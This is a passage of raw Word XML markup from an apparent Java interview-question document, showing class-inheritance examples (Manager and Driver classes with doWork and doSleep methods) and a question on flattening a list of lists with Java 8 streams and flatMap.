      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F75E4"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D6A8A2A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B433B08"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doSlee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D3C9094"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is sleeping."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67833C2E"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0A89651"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B6097"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doWor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9D55F6A"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is working."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA4830"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A703BBF"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EB0CDDB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5F844"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anager class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA21AE6"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nag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xtend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BEECD5B"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nager</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d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addres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3491A2A"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up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d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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D8BB5"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9657F69"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5C51F"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34F81858"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doWor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CCAB8E5"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is managing the team."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823E342"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3D2526A"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6B074AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A787487"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Driver class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B1F8F"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Driv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xtend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D96737C"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Driver</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d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addres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FD94146"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up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d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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAA037A"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154527D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED3FDB"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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7821D"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doWor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D075171"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 is driving the vehicle."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC0F09"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B69D08E"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572B89E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2167EE"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Main method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CE9D4"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FC35816"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nager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> manag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anager</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li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2020-01-0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New York"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24171764"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Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> driv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Driver</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Bo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8</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2022-03-0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Los Angeles"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9112D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44A785"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 Manager Actions ---"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB4753"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mana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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C02DC"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mana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oSleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16853E"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mana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oWork</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0274C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246437E"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 Driver Actions ---"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C980CC5"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driv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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EACCC"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driv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oSleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7CFAB"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driv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oWork</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6D0D9" w14:textId="77777777"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85E19A6" w14:textId="789DCDA9" w:rsidR="001D2607" w:rsidRPr="00CE4B95"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7DD6D5FE" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DC7692" w14:textId="7FB12809" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="_Toc196307864"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00E97FC7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Flatten a List of Lists using Java 8 Streams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w14:paraId="501D40A6"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;lnteger&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listl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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45EF6F"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;lnteger&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1</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p>
    <w:p w14:paraId="4EFF219B"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;lnteger&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2</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4</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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB91E90"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;lnteger&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3</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7</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8</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D63954"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39621C24"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list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ddA11</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE55A4"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list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ddA11</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03882FC7"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list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ddA11</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814F09B" w14:textId="4BD924B8"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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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istl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2B566" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC" w:rsidP="005F51EC">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366DB819" w14:textId="77777777" w:rsidR="005F51EC" w:rsidRPr="00CE4B95" w:rsidRDefault="005F51EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9874D"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p>
    <w:p w14:paraId="585846CC"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ollectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0F84B"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33623C93"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lattenListExamp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ABA9962"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39B3777"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l1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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ABBB87"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l2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4</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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B460814"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l3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7</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8</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0BF89"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB09D31"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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listOfList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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B6A5F"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        listOfList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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C84DF"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        listOfList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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040227FF"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        listOfList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d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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C511F7"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F10A3" w14:textId="25E653E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Flattening using flatMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E2A3C"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flatLis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listOfLis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p>
    <w:p w14:paraId="6FE724A6"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latMap</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p>
    <w:p w14:paraId="1175E0E1"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llec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ollecto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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240D2DB"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE60176"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Flattened Lis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latList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D2E6E9" w14:textId="77777777"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773273D" w14:textId="3F101F28" w:rsidR="005F51EC" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60974712" w14:textId="77777777" w:rsidR="007D023E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D023E" w:rsidP="005F51EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446CC2B1" w14:textId="78613CA2" w:rsidR="007D023E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D023E" w:rsidP="007D023E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc196307865"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
